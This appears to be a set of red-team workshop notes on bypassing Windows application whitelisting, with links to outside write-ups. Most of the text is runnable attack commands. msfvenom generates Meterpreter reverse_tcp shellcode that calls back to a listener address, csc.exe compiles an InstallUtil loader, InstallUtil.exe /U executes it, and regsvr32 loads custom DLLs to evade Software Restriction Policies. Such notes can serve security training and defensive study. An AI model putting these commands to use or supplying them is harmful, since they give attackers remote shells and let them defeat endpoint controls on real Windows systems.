=== Shellcode ===

Write-up:

http://subt0x10.blogspot.com/2015/08/application-whitelisting-bypasses-101.html
https://gist.github.com/subTee/408d980d88515a539672

Example:

Step1 - Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=‘xx.xx.xx.xx’ -f csharp

Step2 - Compile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /unsafe /platform:x86 /out:InstallUtil.exe “C:\DefCon-Tools\SRP\SubTee\InstallUtil-ShellCode.cs”

Step2 - Execute
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U InstallUtil.exe

=== P0wnedShell ===

Write-up:

http://subt0x10.blogspot.com/2016/06/what-you-probably-didnt-know-about.html

Example:

cmd.dll (ReactOS)
C:\Windows\System32\regsvr32.exe "C:\DefCon-Tools\SRP\Alternatives\cmd.dll"

custom dll (limitations?)
C:\Windows\System32\regsvr32.exe C:\DefCon-Tools\SRP\SubTee\Resvr32-CalcNotepad.dll
C:\Windows\System32\regsvr32.exe /u C:\DefCon-Tools\SRP\SubTee\Resvr32-CalcNotepad.dll

Generate shellcode:
msfvenom -p windows/meterpreter/reverse_tcp LHOST='192.168.187.132' -f csharp